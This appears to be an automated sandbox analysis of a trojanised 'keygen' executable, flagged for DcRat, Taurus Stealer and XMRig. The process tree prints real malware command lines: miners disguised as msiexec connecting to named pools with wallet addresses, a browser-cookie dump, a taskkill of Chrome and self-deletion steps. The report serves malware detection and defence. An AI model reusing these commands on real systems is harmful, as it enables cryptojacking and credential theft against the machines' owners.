Overview

overview

10

Static

static

keygen-step-4.exe

windows7_x64

10

keygen-step-4.exe

windows10_x64

10

Analysis

  • max time kernel
    149s
  • max time network
    142s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    04-04-2021 11:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    keygen-step-4.exe

  • Size

    3.0MB

  • MD5

    3ac32a87de172d89addb21d6b309b7d3

  • SHA1

    947df0b364b7773397620d396d9278d9dba48ac2

  • SHA256

    3f78af0e31a617f10ece7cffca4b530ac38b5c2079e004a690b4181e98b7288c

  • SHA512

    50aaccee48be92fa7f59a87da150c4f611f0173e595f252f068b67a9794626d58a904799054ca10c5d7bb22f14045c4aacf93c3424449e5df677a800a91cb626

Score
10/10
dcrattaurus_stealerxmrigdiscoveryevasioninfostealerminerpersistenceratspywarestealertrojan

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

    ratinfostealerdcrat
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Taurus Stealer

    Taurus is an infostealer first seen in June 2020.

    trojanstealertaurus_stealer
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner Payload 4 IoCs
    miner
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 15 IoCs
  • Loads dropped DLL 43 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 3 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 42 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 10 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
    evasionspywaretrojan
  • NTFS ADS 3 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 43 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:464
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:840
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:2444
    • C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
      "C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
      1⤵
      • Loads dropped DLL
      • Checks whether UAC is enabled
      • Suspicious use of WriteProcessMemory
      PID:1896
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"
        2⤵
        • Executes dropped EXE
        • Modifies system certificate store
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1776
        • C:\Users\Admin\AppData\Local\Temp\PQM1ALU0SI\multitimer.exe
          "C:\Users\Admin\AppData\Local\Temp\PQM1ALU0SI\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
          3⤵
          • Executes dropped EXE
          • Drops file in Windows directory
          • Suspicious use of WriteProcessMemory
          PID:1820
          • C:\Users\Admin\AppData\Local\Temp\PQM1ALU0SI\multitimer.exe
            "C:\Users\Admin\AppData\Local\Temp\PQM1ALU0SI\multitimer.exe" 1 101
            4⤵
            • Executes dropped EXE
            PID:804
        • C:\Users\Admin\AppData\Local\Temp\HNWYSQO8JM\setups.exe
          "C:\Users\Admin\AppData\Local\Temp\HNWYSQO8JM\setups.exe" ll
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:428
          • C:\Users\Admin\AppData\Local\Temp\is-588CU.tmp\setups.tmp
            "C:\Users\Admin\AppData\Local\Temp\is-588CU.tmp\setups.tmp" /SL5="$2017C,454998,229376,C:\Users\Admin\AppData\Local\Temp\HNWYSQO8JM\setups.exe" ll
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1148
            • C:\Program Files\Internet Explorer\iexplore.exe
              "C:\Program Files\Internet Explorer\iexplore.exe" https://catser.inappapiurl.com/redirect/57a764d042bf8/
              5⤵
              • Modifies Internet Explorer settings
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:460
              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:460 CREDAT:275457 /prefetch:2
                6⤵
                • Modifies Internet Explorer settings
                • Suspicious use of SetWindowsHookEx
                PID:1656
              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:460 CREDAT:472074 /prefetch:2
                6⤵
                • Modifies Internet Explorer settings
                • NTFS ADS
                • Suspicious use of SetWindowsHookEx
                PID:2160
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\askinstall20.exe
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\askinstall20.exe"
        2⤵
        • Executes dropped EXE
        • Modifies system certificate store
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:740
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /c taskkill /f /im chrome.exe
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1652
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /f /im chrome.exe
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1100
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Full_Version.exe
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Full_Version.exe"
        2⤵
        • Executes dropped EXE
        • Drops file in Program Files directory
        • Suspicious use of WriteProcessMemory
        PID:2116
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2184
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
            4⤵
            • Loads dropped DLL
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2296
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Modifies data under HKEY_USERS
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2204
        • C:\Users\Admin\AppData\Roaming\6164.tmp.exe
          "C:\Users\Admin\AppData\Roaming\6164.tmp.exe"
          3⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of SetThreadContext
          • Modifies system certificate store
          PID:2572
          • C:\Windows\system32\msiexec.exe
            -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
            4⤵
              PID:3032
            • C:\Windows\system32\msiexec.exe
              -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
              4⤵
              • Blocklisted process makes network request
              • Suspicious use of AdjustPrivilegeToken
              PID:1828
          • C:\Users\Admin\AppData\Roaming\623F.tmp.exe
            "C:\Users\Admin\AppData\Roaming\623F.tmp.exe"
            3⤵
            • Executes dropped EXE
            PID:2624
            • C:\Windows\SysWOW64\cmd.exe
              /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\623F.tmp.exe
              4⤵
                PID:1920
                • C:\Windows\SysWOW64\timeout.exe
                  timeout /t 3
                  5⤵
                  • Delays execution with timeout.exe
                  PID:432
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe"
              3⤵
                PID:2228
                • C:\Windows\SysWOW64\PING.EXE
                  ping 127.0.0.1
                  4⤵
                  • Runs ping.exe
                  PID:2332
            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\md2_2efs.exe
              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\md2_2efs.exe"
              2⤵
              • Executes dropped EXE
              PID:2212
            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\BTRSetp.exe
              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\BTRSetp.exe"
              2⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:2080
            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gcttt.exe
              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gcttt.exe"
              2⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Adds Run key to start application
              PID:2404
              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                3⤵
                • Executes dropped EXE
                PID:2832
              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                3⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                PID:1556

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • memory/428-39-0x0000000000401000-0x000000000040C000-memory.dmp

            Filesize

            44KB

            Download

          • memory/804-55-0x0000000001E50000-0x0000000001E52000-memory.dmp

            Filesize

            8KB

            Download

          • memory/804-52-0x000007FEEDFE0000-0x000007FEEE97D000-memory.dmp

            Filesize

            9.6MB

            Download

          • memory/804-53-0x000007FEEDFE0000-0x000007FEEE97D000-memory.dmp

            Filesize

            9.6MB

            Download

          • memory/840-96-0x00000000016E0000-0x0000000001747000-memory.dmp

            Filesize

            412KB

            Download

          • memory/840-83-0x0000000000810000-0x0000000000854000-memory.dmp

            Filesize

            272KB

            Download

          • memory/1148-40-0x00000000002C0000-0x00000000002C1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1776-13-0x0000000000580000-0x0000000000582000-memory.dmp

            Filesize

            8KB

            Download

          • memory/1776-10-0x000007FEF5430000-0x000007FEF5E1C000-memory.dmp

            Filesize

            9.9MB

            Download

          • memory/1776-11-0x0000000000AC0000-0x0000000000AC1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1820-42-0x000007FEEDFE0000-0x000007FEEE97D000-memory.dmp

            Filesize

            9.6MB

            Download

          • memory/1820-17-0x000007FEEDFE0000-0x000007FEEE97D000-memory.dmp

            Filesize

            9.6MB

            Download

          • memory/1820-19-0x00000000020F0000-0x00000000020F2000-memory.dmp

            Filesize

            8KB

            Download

          • memory/1828-125-0x0000000140000000-0x000000014070A000-memory.dmp

            Filesize

            7.0MB

            Download

          • memory/1828-124-0x0000000000100000-0x0000000000114000-memory.dmp

            Filesize

            80KB

            Download

          • memory/1828-121-0x0000000140000000-0x000000014070A000-memory.dmp

            Filesize

            7.0MB

            Download

          • memory/1828-128-0x0000000140000000-0x000000014070A000-memory.dmp

            Filesize

            7.0MB

            Download

          • memory/1828-134-0x0000000000170000-0x0000000000190000-memory.dmp

            Filesize

            128KB

            Download

          • memory/1896-2-0x0000000075781000-0x0000000075783000-memory.dmp

            Filesize

            8KB

            Download

          • memory/1900-41-0x000007FEF6080000-0x000007FEF62FA000-memory.dmp

            Filesize

            2.5MB

            Download

          • memory/2080-142-0x0000000000990000-0x0000000000991000-memory.dmp

            Filesize

            4KB

            Download

          • memory/2080-136-0x000007FEF5220000-0x000007FEF5C0C000-memory.dmp

            Filesize

            9.9MB

            Download

          • memory/2080-137-0x0000000000C80000-0x0000000000C81000-memory.dmp

            Filesize

            4KB

            Download

          • memory/2080-139-0x00000000003D0000-0x00000000003D1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/2080-140-0x000000001B0A0000-0x000000001B0A2000-memory.dmp

            Filesize

            8KB

            Download

          • memory/2080-141-0x00000000003E0000-0x0000000000401000-memory.dmp

            Filesize

            132KB

            Download

          • memory/2184-76-0x00000000025F0000-0x00000000025F4000-memory.dmp

            Filesize

            16KB

            Download

          • memory/2204-110-0x0000000002550000-0x0000000002598000-memory.dmp

            Filesize

            288KB

            Download

          • memory/2204-70-0x0000000000020000-0x000000000002D000-memory.dmp

            Filesize

            52KB

            Download

          • memory/2212-133-0x0000000070E60000-0x0000000071003000-memory.dmp

            Filesize

            1.6MB

            Download

          • memory/2296-94-0x0000000000510000-0x0000000000566000-memory.dmp

            Filesize

            344KB

            Download

          • memory/2296-93-0x00000000001C0000-0x00000000001FA000-memory.dmp

            Filesize

            232KB

            Download

          • memory/2444-98-0x0000000000500000-0x0000000000567000-memory.dmp

            Filesize

            412KB

            Download

          • memory/2444-148-0x00000000029A0000-0x0000000002AA6000-memory.dmp

            Filesize

            1.0MB

            Download

          • memory/2572-109-0x000007FEFBA71000-0x000007FEFBA73000-memory.dmp

            Filesize

            8KB

            Download

          • memory/2624-113-0x0000000007180000-0x000000000C5FC000-memory.dmp

            Filesize

            84.5MB

            Download

          • memory/2624-120-0x0000000000400000-0x000000000587C000-memory.dmp

            Filesize

            84.5MB

            Download

          • memory/3032-123-0x0000000140000000-0x0000000140383000-memory.dmp

            Filesize

            3.5MB

            Download

          • memory/3032-118-0x0000000140000000-0x0000000140383000-memory.dmp

            Filesize

            3.5MB

            Download